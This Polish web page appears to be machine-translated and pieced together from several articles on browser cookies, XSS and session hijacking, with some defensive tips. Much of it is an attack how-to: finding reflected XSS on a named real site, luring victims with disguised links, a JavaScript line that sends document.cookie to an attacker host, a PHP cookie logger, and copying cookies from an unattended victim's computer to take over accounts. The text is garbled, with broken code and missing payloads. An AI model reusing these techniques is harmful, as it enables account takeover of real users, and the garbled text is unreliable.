Mój przyjaciel zapomniał hasła do jednej strony. Jednak wcześniej zaznaczył pole „Zapamiętaj mnie” podczas logowania. Przeglądarka Google Chrome, który pozwolił mu zalogować się do serwisu pod swoim kontem. Zapytano mnie, czy ten magiczny stan można przenieść na inny komputer. Poprawniej byłoby oczywiście zmienić lub przywrócić hasło, ale znajomy nie mógł tego zrobić z przyczyn niezwiązanych ze sprawą.

Jak używać interceptera-ng dla manekinów?

Pomimo różnorodności wyboru nowoczesnego oprogramowania, trudno jest znaleźć programy do hakowania na Androida lepiej niż intercepter ng. Pierwszym kryterium przemawiającym na korzyść tego produktu jest jego rzeczywiste działanie. Większość proponowanych snifferów w sieci to tylko imitacje, które nie spełniają deklarowanych funkcji.

Kolejnymi pozytywnymi czynnikami są wszechstronność aplikacji i objęcie szerokiego grona użytkowników.

Pomoc komputerowa 939-29-71

Zacznijmy w kolejności. Ciasteczka lub „ciasteczka” to bardzo małe pliki tekstowe - zakładki z informacjami.

Serwer WWW wysyła te informacje do przeglądarki użytkownika. gdzie te informacje są przechowywane do czasu, gdy będą potrzebne. Mętnawy. Dobrze. OK.

Postaram się, żeby było to jeszcze łatwiejsze. Widzieć. zarejestrowałeś się w dowolnej witrynie.

W momencie rejestracji tworzone są właśnie te „ciasteczka”.

Tutaj są.

Pojemnik na ciasteczka

Program nasłuchuje ruchu w sieci WiFi, przechwytuje pliki cookie i replikuje sesję użytkownika w przeglądarce, powtarzając żądania z jego danymi uwierzytelniającymi. Autor Matthew Sullivan przedstawił program 30 września na konferencji hakerskiej Derbycon. W trakcie przemówienia Matthew Sullivan przechwycił przez WiFi niezabezpieczoną sesję z Google jednego z uczestników konferencji.

Jak ukraść ciasteczka

Jeśli na stronie witryny wejdziesz w pasek adresu Przeglądarka Firefox lub Opera następujący tekst: javascript:document.write(document.cookie); zobaczysz coś takiego: remixAdminsBar=0; remixGroupType=0; remixpass=********************; ściana remiksu=0; informacje o remiksie=0; remixMembersBar=0; opis remiksu=0; remixautozakładka=8; remixemail=********; remiksid=23363; remiks.k=5; remiksaudio=0; remixlinksBar=1; remixOfficersBar=0; remixZdjęciaBar=0; remixTopicsBar=0; remiksy wideo=0; remixOstatnieWiadomości=0; remixAlbumsBar=0 Uwaga! .

Kompletny przewodnik po skryptach między witrynami

XSS to rodzaj podatności oprogramowanie, natywna dla aplikacji internetowych, która umożliwia atakującemu wstrzyknięcie skryptu po stronie klienta do stron internetowych przeglądanych przez innych użytkowników Wikipedia ma następującą definicję XSS: obejście ograniczeń bezpieczeństwa przeglądarki)”, która umożliwia atakującemu wstrzyknięcie skryptu po stronie klienta do stron internetowych przeglądanych przez innych użytkowników.

Różnica między plikami cookie a sesjami

Nie tak dawno napisałem artykuł o tym, jak rejestrować i autoryzować użytkowników w serwisie.

”. W tym artykule przedstawię różnicę między sesjami a plikami cookie. dokonać ostatecznego wyboru.

Ciasteczka. Nie, nie chodzi o ciasteczka, chodzi o Twoje bezpieczeństwo. Idziesz więc do swojej ulubionej witryny „vkontakte” (lub na przykład przeglądasz pocztę) na czyimś komputerze, odmawiasz opcji „zapisz hasło”, z radością przeglądasz pocztę i wychodzisz. I nie myśl o tym, że pod swoim nazwiskiem możesz teraz iść do sieć społeczna lub poczta.

Nawet nie rozważam sytuacji programu, który zapamiętuje hasło bez Twojej wiedzy. To już celowy hack i prawdopodobnie będziesz podejrzewał, że coś takiego może się zdarzyć i nie przejdziesz do swojej ulubionej witryny na takim komputerze. Ale możemy mówić o prostej ludzkiej ciekawości - odwiedzaliśmy znajomych, a potem znowu, a oni mieli okazję przeczytać twoją pocztę. Czy jesteś pewien, że odmówią takiej możliwości? Nie boisz się, że coś wyjdzie? W każdym razie odłożę na bok kwestie moralności i po prostu opowiem o tym, jak informacje są przechowywane na komputerze, które można teraz wpuścić na jakąś stronę bez pytania o hasło.

jak ukraść ciasteczka

A nazwa tej technologii to pliki cookie.

I tu wszystko się zaczęło. Protokół http, na którym tak naprawdę przeglądasz strony (w tym tę), początkowo nie sugerował możliwości utrzymywania połączenia. To znaczy, z grubsza mówiąc, wysyłasz żądanie do witryny, otrzymujesz odpowiedź, jest ona wyświetlana na ekranie, a następnie serwer nic o tobie nie pamięta. Oczywiście jest to dobre, gdy strona jest czysto informacyjna i nie powinna nic o Tobie pamiętać, ale żyjemy w epoce Web 2.0 😉 Naturalnym rozwojem protokołu są żądania POST i GET, kiedy wyślesz jakieś dane, serwer może zapisz je do bazy danych, ale to nie wystarczy.

Spójrzmy na bardzo prosty przykład. Forum. A więc zarejestrowałeś się, a na forum jest zapis, że jest taki a taki użytkownik z takim a takim hasłem i kilkoma dodatkowymi danymi. Ale teraz wchodzisz na forum i logujesz się - podaj swoje hasło. Gdzieś powinna być informacja, że ​​jesteś zalogowany. Na serwerze? Oczywiście nie! Nie ma możliwości zapisania na serwerze informacji, że autoryzacja została wykonana z Twojego komputera - nie będzie w stanie odróżnić Cię od kogoś innego (nawet Twój adres IP nie identyfikuje Cię jednoznacznie)! W związku z tym informacja, że ​​nastąpiła autoryzacja, musi być przechowywana na Twoim komputerze. Po to są ciasteczka, po to zostały stworzone.

Plik cookie to mały zapis na Twoim komputerze, który przechowuje informacje o odwiedzanej witrynie. Po autoryzacji tworzony jest podobny wpis, po którym możesz już chodzić po forum, a ono Cię rozpozna. Jednak stanie się to już automatycznie - dzięki informacjom zapisanym w ciasteczku - więc udawanie, że jesteś głównym administratorem forum, nadal nie będzie działać z pominięciem weryfikacji hasła.

Teraz możemy wrócić do miejsca, w którym zaczął się ten artykuł. Jeśli zalogowałeś się gdzieś, nawet nie zapisując swojego hasła, może się zdarzyć, że na komputerze został utworzony wpis, który umożliwia teraz wejście do tego zasobu pod Twoim imieniem bez autoryzacji. Sam taki wpis po pewnym czasie stanie się nieaktualny, ale możesz wymusić jego wyczyszczenie. Każda przeglądarka robi to inaczej, pokażę Ci jak to zrobić w moim ulubionym Google Chrome. Otwieranie opcji

Przejdź do zakładki „zaawansowane” i znajdź przycisk „pokaż pliki cookie”

Teraz możesz oczywiście usunąć wszystkie pliki cookie, ale może to zdenerwować właściciela komputera. Dlatego np. w górnym polu możesz wpisać nazwę interesującej Cię strony

Wtedy tylko pliki cookie związane z tą witryną mogą zostać wyczyszczone. Możesz spróbować mojego. Co więcej, jeśli zalogujesz się na moim forum, a następnie wyczyścisz pliki cookie, informacje o autoryzacji zostaną zapomniane. Spróbuj!

komentarze wspierane przez

1. Co to jest XSS?
Luka typu XSS umożliwia wstawienie dowolnego kodu javascript do treści strony. Atak XSS różni się od innych (np. wstrzyknięcie SQL lub wstrzyknięcie PHP) tym, że działa nie na serwerze, ale na kliencie.

jak ukraść ciasteczka

Z jego pomocą nie można przeglądać tabel bazy danych, wgrywać powłoki itp. Najczęstszym zastosowaniem XSS jest kradzież plików cookie.
Cookies (Cookies) – niewielka część danych tworzona przez serwer WWW i przechowywana na komputerze użytkownika jako plik. Zazwyczaj pliki cookie służą do przechowywania kont i najczęściej zawierają zaszyfrowane hasło, login i identyfikator sesji (choć nie zawsze).
XSS są dwojakiego rodzaju, aktywne i pasywne.

Pasywny XSS wymagać od ofiary bezpośredniego udziału, na przykład podążania za linkiem zawierającym kod javascript. Korzystając z tego typu XSS, nie możesz obejść się bez SI (inżynierii społecznej)

Aktywny XSS nie wymagają udziału ofiary, wystarczy, że wejdzie na stronę z XSS. Aktywny XSS może być np. w postach na forum, na czacie, w dodawaniu newsów itp.

2. Wyszukaj XSS
W tym akapicie powiem Ci jak znaleźć xss

2.1 Pasywny XSS
Aby znaleźć pasywny XSS, po prostu zastąp go w formularzu wejściowym jeśli skrypt zadziałał i pojawił się komunikat „xss”, to luka jest obecna, jeśli skrypt nie zadziałał, nadal możesz spróbować ">, jest to prawdopodobnie najczęstsza usterka xss. Jeśli ani jeden, ani drugi skrypt nie działał, najprawdopodobniej nie ma luki.
Spójrzmy na przykład.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Widzisz formularz wyszukiwania? wstaw tam "> i kliknij "znajdź"
Wyleciało okno z xss, co oznacza, że ​​xss jest obecny. (Być może w czasie, gdy czytasz ten artykuł, ten xss będzie już naprawiony)

2.2 Aktywny XSS
Taki CSS może być np. w polach profilu, przy dodawaniu newsów w nazwie newsa oraz w samym newsie (rzadziej), w wiadomościach na forach/czatach/księgach gości z włączonym html. Tutaj wszystko jest proste, w pola wpisujemy skrypt z poprzedniego akapitu, a jeśli komunikat wyświetla się na ekranie, to podatność jest obecna.
Rozważ xss w tagach BB na forach.
możesz spróbować głupio wstawić kod javascript do tagu, tak:
javascript:alert('xss')
Niektóre tagi mają parametry, na przykład tag ma parametry dynsrc i lowsrc, spróbujmy zastąpić kod w ten sposób:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Jeśli skrypt zadziałał, xss to

3. Wykorzystywanie XSS do kradzieży plików cookie
Teraz najsmaczniejsze
Aby ukraść pliki cookie, potrzebujemy sniffera internetowego, możesz zainstalować jakiś sniffer na swoim hostingu lub możesz użyć sniffera internetowego, który jest teraz pełny.
Aby wykraść pliki cookie za pośrednictwem pasywnego XSS, ofiara musi kliknąć trujący link. Zamiast tego użyjemy do kradzieży plików cookie inny skrypt:
zastępujemy skrypt w linku i pozwalamy ofierze go śledzić, przeglądać dziennik sniffera i cieszyć się.
Spójrzmy na przykład.
Weźmy ten XSS na ramblerze z poprzedniego akapitu.
Pasta
">
w formularzu wyszukiwania kliknij "znajdź", spójrz na pasek adresu i zobacz:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Wrzucamy ten link do ofiary i cieszymy się z plików cookie.
Widząc taki link, ofiara może coś podejrzewać, dlatego wskazane jest zakodowanie
">
w adresie URL Lub skorzystaj z usług takich jak http://tinyurl.com/
Przejdźmy do aktywnego XSS, tutaj wszystko jest proste, zamiast alert() wstawiamy img = new Image() img.src = "sniffer image address"+document.cookie;

Teraz mamy ciasteczka. Ale co z nimi zrobić? To proste, trzeba je zastąpić własnymi. W Przeglądarka Opera jest wbudowany edytor ciasteczek (narzędzia->zaawansowane->zarządzanie ciasteczkami), jest wtyczka do firefoxa (nie pamiętam nazwy, używaj google)
To wszystko na razie, być może artykuł zostanie uzupełniony

Na pytanie Jak zdobyć COOKIES. Potrzebujesz ciasteczek, jak je zdobyć, powiedz mi !!! 1 zestaw autora Vlad eeeeeeeeeeeeee najlepsza odpowiedź to Co to są pliki cookie?
Faktem jest, że w procesie rozwoju technologii www i wprowadzania języków programowania w Internecie przed twórcami programów pojawił się bardzo poważny problem - jak zapisać wyniki wykonania algorytmu dla każdego konkretnego użytkownika na przez długi czas? Sam protokół HTTP nie ma możliwości przechwytywania wyników procesów oprogramowania. Korzystanie z sesji również nie jest rozwiązaniem problemu, ponieważ ich działanie zostaje przerwane natychmiast po zerwaniu połączenia z serwerem.
Problem został rozwiązany wraz z wprowadzeniem mechanizmu cookies (czyli przetłumaczonych z języka angielskiego „cookies”). Cookies mają niezwykłą właściwość - są przechowywane na dysku twardym użytkownika i mogą być tam przechowywane przez prawie nieograniczony czas.
Zasadniczo pliki cookie to zwykłe pliki tekstowe przechowywane w specjalnym katalogu używanym przez przeglądarkę (zwykle zwanym tymczasowymi plikami internetowymi), które można zobaczyć, przechodząc do tego katalogu ( szybki dostęp do niego dla przeglądarki IE odbywa się poprzez pozycje menu Narzędzia -> Opcje internetowe -> Tymczasowe pliki internetowe -> Ustawienia -> Widok
Niektóre pliki cookie mogą być przechowywane tylko przez jedną sesję, są usuwane po zamknięciu przeglądarki. Inne, ustawione na określony czas, są zapisywane do pliku. Ogólnie plik ten nazywa się „cookies.txt” (ale może ich być kilka) i znajduje się w katalogu roboczym przeglądarki zainstalowanej na komputerze.
innymi słowy
Plik cookie to niewielka informacja tekstowa, którą serwer wysyła do przeglądarki. Same ciasteczka nie mogą nic zrobić, ale gdy użytkownik uzyskuje dostęp do serwera (wpisuje jego adres w wierszu przeglądarki), serwer może odczytać informacje zawarte w ciasteczkach i na podstawie ich analizy wykonać dowolne czynności. Na przykład w przypadku autoryzowanego dostępu do czegoś za pośrednictwem sieci, login i hasło są przechowywane w plikach cookie podczas sesji, co pozwala użytkownikowi nie wprowadzać ich ponownie przy żądaniu każdego dokumentu chronionego hasłem.
Jeśli próbujesz uzyskać dostęp za pośrednictwem tego tematu do cudzych kont chronionych hasłem, musisz znaleźć sposób zdalnie (trojan) lub bezczelnie kopiując na dysk flash, jeśli masz dostęp do komputera, na którym pracuje ofiara, skopiuj ten plik cookie.txt i zastąp go w swojej (tej samej) przeglądarce. Następnie przechodzisz do żądanej witryny, na której jesteś zainteresowany kontem i automatycznie uzyskujesz dostęp. Pamiętaj jednak, że jeśli ofiara naciśnie wyjście z konta (na przykład z poczty) pod koniec pracy, informacje o sesji zostaną usunięte z plików cookie i nie uzyskasz żadnego dostępu.
Mozilla Firefox przechowuje pliki cookie w profilu użytkownika, w pliku C:Documents and SettingsNazwa użytkownikaDane aplikacjiMozillaFirefoxProfiles<имя профиля>pliki cookie.txt
Internet Explorer zapisuje te pliki cookie jako osobne pliki tekstowe w folderze C:Documents and SettingsNazwa użytkownikaCookies
Opera przechowuje ciasteczka w pliku C:Documents and SettingsNazwa użytkownikaDane aplikacjiOperaOperaprofilecookies4.dat

Ciasteczka - informacje w postaci pliku tekstowego, przechowywane na komputerze użytkownika przez serwis. Zawiera dane uwierzytelniające (login/hasło, ID, numer telefonu, adres) skrzynka pocztowa), ustawienia użytkownika, status dostępu. Przechowywane w profilu przeglądarki.

Hack na ciasteczka to kradzież (lub „przechwycenie”) sesji użytkownika do zasobu internetowego. Informacje tajne stają się dostępne nie tylko dla nadawcy i odbiorcy, ale także dla osoby trzeciej - osoby, która przechwyciła.

Narzędzia i techniki hakowania plików cookie

Złodzieje komputerów, podobnie jak ich koledzy w prawdziwym życiu, oprócz umiejętności, zręczności i wiedzy mają oczywiście własne narzędzia – rodzaj arsenału kluczy i sond. Zapoznajmy się z najpopularniejszymi sztuczkami hakerów, którymi wyłudzają ciasteczka od mieszkańców Internetu.

Wąchacze

Programy specjalne do monitorowania i analizowania ruchu sieciowego. Ich nazwa pochodzi od angielskiego czasownika „sniff” (sniff), ponieważ. dosłownie „wywęszyć” przesyłane pakiety między węzłami.

Jednak atakujący używają sniffera do przechwytywania danych sesji, wiadomości i innych poufna informacja. Przedmiotem ich ataków są w większości niezabezpieczone sieci, w których pliki cookie są wysyłane w ramach otwartej sesji HTTP, czyli praktycznie nie są szyfrowane. (Publiczne Wi-Fi jest najbardziej zagrożone).

Następujące metody są używane do wstrzykiwania sniffera do kanału internetowego między hostem użytkownika a serwerem WWW:

  • "nasłuchiwanie" interfejsów sieciowych (koncentratorów, przełączników);
  • rozgałęzianie i kopiowanie ruchu;
  • połączenie z przerwą kanału sieciowego;
  • analiza poprzez specjalne ataki, które przekierowują ruch ofiar do sniffera (MAC-spoofing, IP-spoofing).

Skrót XSS oznacza Cross Site Scripting. Służy do atakowania stron internetowych w celu kradzieży danych użytkownika.

Sposób działania XSS wygląda następująco:

  • osoba atakująca wstrzykuje złośliwy kod (specjalny zamaskowany skrypt) na stronie internetowej witryny, forum lub do wiadomości (na przykład podczas czatowania w sieci społecznościowej);
  • ofiara odwiedza zainfekowaną stronę i aktywuje się ustaw kod na twoim komputerze (kliknięcia, podążanie za linkiem itp.);
  • z kolei aktywowany złośliwy kod „wydobywa” z przeglądarki poufne dane użytkownika (w szczególności pliki cookies) i wysyła je na serwer WWW osoby atakującej.

Aby „wszczepić” programowy mechanizm XSS, hakerzy wykorzystują różnego rodzaju luki w serwerach WWW, serwisach internetowych i przeglądarkach.

Wszystkie luki XSS dzielą się na dwa typy:

  • Bierny. Atak jest uzyskiwany poprzez odpytywanie określonego skryptu strony internetowej. Złośliwy kod można wprowadzać w różnych formularzach na stronie internetowej (na przykład w pasku wyszukiwania w witrynie). Najbardziej podatne na pasywny XSS są zasoby, które nie filtrują znaczników HTML po przybyciu danych;
  • Aktywny. Znajduje się bezpośrednio na serwerze. I są aktywowane w przeglądarce ofiary. Są aktywnie wykorzystywane przez oszustów na różnych blogach, czatach i kanałach informacyjnych.

Hakerzy starannie "kamuflują" swoje skrypty XSS, aby ofiara niczego nie podejrzewała. Zmieniają rozszerzenie pliku, przekazują kod jako obrazek, motywują do kliknięcia w link, przyciągają ciekawą treścią. W efekcie: użytkownik PC, który nie poradził sobie z własną ciekawością, własnoręcznie (kliknięciem myszki) wysyła ciasteczka sesyjne (z loginem i hasłem!) do autora skryptu XSS - komputerowego złoczyńcy.

Sfałszowanie plików cookie

Wszystkie pliki cookies są przechowywane i wysyłane na serwer WWW (z którego „pochodzą”) bez żadnych zmian – w swojej pierwotnej formie – z tymi samymi wartościami, ciągami i innymi danymi. Celowa modyfikacja ich parametrów nazywana jest fałszowaniem plików cookie. Innymi słowy, kiedy plik cookie jest sfałszowany, napastnik to myślenie życzeniowe. Na przykład podczas dokonywania płatności w sklepie internetowym kwota płatności zmienia się w ciasteczku na mniejszą stronę - tym samym pojawia się „oszczędność” na zakupach.

Ciasteczka sesyjne skradzione w sieci społecznościowej z czyjegoś konta są „wstawiane” do innej sesji i na innym komputerze. Właściciel skradzionych ciasteczek otrzymuje pełny dostęp na konto ofiary (korespondencja, treść, ustawienia strony), o ile jest na swojej stronie.

„Edycja” plików cookies odbywa się za pomocą:

  • funkcje „Zarządzaj plikami cookie…” w przeglądarce Opera;
  • dodatki Cookies Manager i Advanced Cookie Manager dla FireFox;
  • Narzędzia IECookiesView (tylko dla Internet Explorera);
  • Edytor tekstu jak AkelPad, Notatnik lub Notatnik Windows.

Fizyczny dostęp do danych

Wysoko prosty obwód wdrożenie składa się z kilku etapów. Ale jest to skuteczne tylko wtedy, gdy komputer ofiary z sesja otwarta, na przykład Vkontakte, pozostaje bez opieki (i to przez dość długi czas!):

  1. Wejdź w pasek adresu przeglądarki funkcja javascript, który wyświetla wszystkie zapisane pliki cookie.
  2. Po naciśnięciu "ENTER" wszystkie pojawiają się na stronie.
  3. Pliki cookie są kopiowane, zapisywane do pliku, a następnie przenoszone na dysk flash.
  4. Na innym komputerze pliki cookie są zastępowane w nowej sesji.
  5. Dostęp do konta ofiary zostaje otwarty.

Z reguły hakerzy używają powyższych narzędzi (+ innych) zarówno w połączeniu (ponieważ poziom ochrony wielu zasobów sieciowych jest dość wysoki), jak i osobno (gdy użytkownicy są nadmiernie naiwni).

XSS + wąchacz

  1. Tworzony jest skrypt XSS, który określa adres sniffera online (własnej produkcji lub konkretnej usługi).
  2. Złośliwy kod jest zapisywany z rozszerzeniem .img (format obrazu).
  3. Następnie plik ten jest przesyłany na stronę serwisu, czat lub wiadomość osobistą – gdzie zostanie przeprowadzony atak.
  4. Uwagę użytkownika zwraca stworzona „pułapka” (tu w grę wchodzi socjotechnika).
  5. Jeśli „pułapka” działa, pliki cookie z przeglądarki ofiary są przechwytywane przez sniffera.
  6. Krakers otwiera dzienniki sniffera i wydobywa skradzione ciasteczka.
  7. Następnie dokonuje substytucji w celu uzyskania praw właściciela konta za pomocą powyższych narzędzi.

Ochrona plików cookie przed włamaniami

  1. Korzystaj z połączenia szyfrowanego (przy użyciu odpowiednich protokołów i metod bezpieczeństwa).
  2. Nie odpowiadaj na podejrzane linki, zdjęcia, kuszące oferty zapoznania się z „nowym wolnym oprogramowaniem”. Zwłaszcza od obcych.
  3. Używaj tylko zaufanych zasobów internetowych.
  4. Zakończ autoryzowaną sesję, naciskając przycisk „Wyloguj” (a nie tylko zamykając zakładkę!). Zwłaszcza jeśli konto nie było zalogowane za pomocą komputer osobisty, ale na przykład z komputera w kafejce internetowej.
  5. Nie używaj funkcji „Zapisz hasło” w swojej przeglądarce. Przechowywane dane rejestracyjne czasami zwiększają ryzyko kradzieży. Nie bądź leniwy, nie poświęcaj kilku minut na wpisanie hasła i zalogowanie się na początku każdej sesji.
  6. Po surfowaniu w sieci - odwiedzeniu sieci społecznościowych, forów, czatów, witryn - usuń zapisane pliki cookie i wyczyść pamięć podręczną przeglądarki.
  7. Regularnie aktualizuj przeglądarki i oprogramowanie antywirusowe.
  8. Używaj rozszerzeń przeglądarki, które chronią przed atakami XSS (na przykład NoScript dla FF i Google Chrome).
  9. Okresowo na rachunkach.

A co najważniejsze - nie trać czujności i uwagi podczas relaksu lub pracy w Internecie!

Co to jest ciasteczko?

Istnieje mechanizm, który pozwala serwerowi http przechowywać na komputerze użytkownika niektóre informacje tekstowe a następnie skontaktuj się z nią. Ta informacja zwany ciasteczkiem. W rzeczywistości każdy plik cookie to para: nazwa parametru i jego wartość. Każdemu plikowi cookie przypisana jest również domena, do której należy. Ze względów bezpieczeństwa we wszystkich przeglądarkach serwer http może uzyskiwać dostęp tylko do plików cookie własnej domeny. Dodatkowo pliki cookies mogą mieć datę ważności, w takim przypadku będą przechowywane na komputerze do tej daty, nawet jeśli wszystkie okna przeglądarki są zamknięte.


Dlaczego pliki cookie są ważne?

We wszystkich systemach wieloużytkownikowych pliki cookie służą do identyfikacji użytkownika. Czy raczej aktualne połączenie użytkownika z usługą, sesja użytkownika. Jeśli ktoś rozpozna Twoje pliki cookie, może zalogować się w Twoim imieniu. Ponieważ w ten moment bardzo niewiele zasobów internetowych sprawdza zmianę adresu IP podczas jednej sesji użytkownika.


Jak zmienić lub zmienić pliki cookie?

Twórcy przeglądarek nie zapewniają wbudowanych narzędzi do edycji plików cookie. Ale możesz sobie poradzić ze zwykłym notatnikiem (notatnikiem).


Krok 1: tworzenie plik tekstowy z tekstem

Okna Edytor rejestru Wersja 5.00



@="C:\\IE_ext.htm"

Zapisujemy go pod nazwą IE_ext.reg

Krok 2: Korzystając z utworzonego pliku, dodaj zmiany w rejestrze systemu Windows.

Krok 3: utwórz plik tekstowy z tekstem

< script language="javascript">
external.menuArguments.clipboardData.setData("Tekst" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "nazwatestu=wartośćtestowa; ścieżka=/; domena=domena testowa.ru";
alert(external.menuArgumenty.document.cookie);


Zapisz go jako C:\IE_ext.htm

Krok 4: Wchodzimy na interesującą nas stronę internetową.

Krok 5: Kliknij prawym przyciskiem myszy kliknięcie myszą wolna przestrzeń stronę i wybierz pozycję menu „Praca z plikami cookie”. Zezwól na dostęp do schowka. Twoje pliki cookie dla tej witryny zostaną umieszczone w schowku. Możesz wkleić swój notatnik (notatnik) i zobaczyć.


Krok 6: Aby zmienić niektóre pliki cookie, edytuj plik C:\IE_ext.htm, zastępując Nazwa testu w imieniu ciasteczka, wartość testowa- o jego znaczeniu, domena testowa.com- do domeny serwisu. W razie potrzeby dodaj więcej takich linii. Dla wygody sterowania dodałem do skryptu wyjście aktualnych ciasteczek przed i po zmianie: alert(external.menuArgumenty.document.cookie);

Krok 7: Uruchom ponownie krok 5, a następnie odśwież stronę.

Konkluzja: przejdziemy do tego zasobu internetowego ze zaktualizowanymi plikami cookie.

Jak ukraść pliki cookie za pomocą JavaScript?

Jeśli atakującemu udało się znaleźć możliwość wykonania dowolnego skryptu JavaScript na komputerze ofiary, przeczytaj aktualne ciasteczka może bardzo łatwo. Przykład:


varstr=dokument.cookie;

Ale czy będzie mógł je przenieść na swoją stronę, ponieważ, jak wspomniałem wcześniej, skrypt JavaScript nie może? dodatkowe potwierdzenie uzyskać dostęp do witryny znajdującej się w innej domenie? Okazuje się, że skrypt JavaScript może załadować dowolny obraz znajdujący się na dowolnym serwerze http. Jednocześnie przenieś do tego obrazu wszelkie informacje tekstowe z żądania pobrania. Przykład: http://hackersite.ru/xss.jpg?text_info Więc jeśli uruchomisz ten kod:

zmienna= nowy wygląd();

img.src= „http://hackersite.ru/xss.jpg?”+ encodeURI(dokument.cookie);


wtedy pliki cookie będą w żądaniu pobrania „zdjęcia” i „zostawienia” atakującemu.

Jak obsłużyć takie prośby o przesłanie „zdjęcia”?

Atakujący musi tylko znaleźć hosting za pomocą obsługa php i umieść kod w ten sposób:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fzamknij($fp);
?>

Wtedy wszystkie parametry zapytania do tego skryptu zostaną zapisane w pliku log.txt. Do zastąpienia pozostaje tylko we wcześniej opisanym skrypcie JavaScript http://hackersite.ru/xss.jpg do ścieżki do tego skryptu php.


Wynik

Pokazałem tylko najprostszy sposób wykorzystania luk XSS. Dowodzi jednak, że obecność co najmniej jednej takiej luki w witrynie internetowej przeznaczonej dla wielu użytkowników może umożliwić atakującemu wykorzystanie jej zasobów w Twoim imieniu.

Opera otwórz menu główne, przejdź do sekcji „Ustawienia” i wybierz wiersz „ Ustawienia główne...". I możesz po prostu nacisnąć hot Klawisze CTRL+ F12. Spowoduje to otwarcie okna ustawień przeglądarki, w którym na karcie „Zaawansowane” należy kliknąć sekcję „Pliki cookie” w lewym okienku. W nim musisz kliknąć przycisk „Zarządzaj plikami cookie”.

W Mozilla Firefox otwórz sekcję "Narzędzia" w menu i wybierz element "Ustawienia". W oknie ustawień musisz przejść do zakładki „Prywatność”, znaleźć tam przycisk „Pokaż pliki cookie…” i kliknąć go, aby uzyskać dostęp do listy plików cookie przechowywanych przez przeglądarkę. Tutaj można je wyszukiwać i przeglądać.

W przeglądarce Internet Explorer rozwiń sekcję "Narzędzia" w menu i wybierz "Właściwości". W oknie ustawień właściwości przejdź do zakładki Ogólne i kliknij przycisk Opcje w sekcji Historia przeglądania. W ten sposób otworzysz kolejne okno („Opcje plików tymczasowych”), w którym należy kliknąć przycisk „Pokaż pliki”.

Kliknij nagłówek „Nazwa” na liście zawartości folderu plików tymczasowych programu Internet Explorer, który zostanie otwarty — w ten sposób możesz zgrupować wszystkie pliki cookie w jeden blok we wspólnym stosie heterogenicznych plików. Tutaj możesz znaleźć interesujący plik i otworzyć go w standardowym Notatniku do przeglądania lub edycji.

W przeglądarce Google Chrome kliknij ikonę klucza w prawym górnym rogu okna i wybierz z menu Opcje. Przeglądarka otworzy stronę „Ustawienia”, a Ty klikniesz link „Zaawansowane” w lewym okienku, a na stronie ustawień zaawansowanych kliknij przycisk „Ustawienia treści”. Jeszcze nie jest ostatnia strona w drodze do plików cookies przechowywanych przez tę przeglądarkę.

Kliknij przycisk „Wszystkie pliki cookie i dane witryn” na następnej stronie, aby w końcu uzyskać dostęp do listy plików cookie.

Google Chrome zapewnia możliwość wyszukiwania, przeglądania i usuwania plików cookie.

W przeglądarce Safari kliknij ikonę koła zębatego po prawej stronie górny róg i wybierz wiersz "Ustawienia ...". W oknie zmiany ustawień należy przejść do zakładki „Bezpieczeństwo”, aby kliknąć tam przycisk „Pokaż pliki cookie”. Safari udostępnia tylko funkcje wyszukiwania i usuwania plików cookie, zawartość tych plików tymczasowych można tutaj zobaczyć tylko częściowo.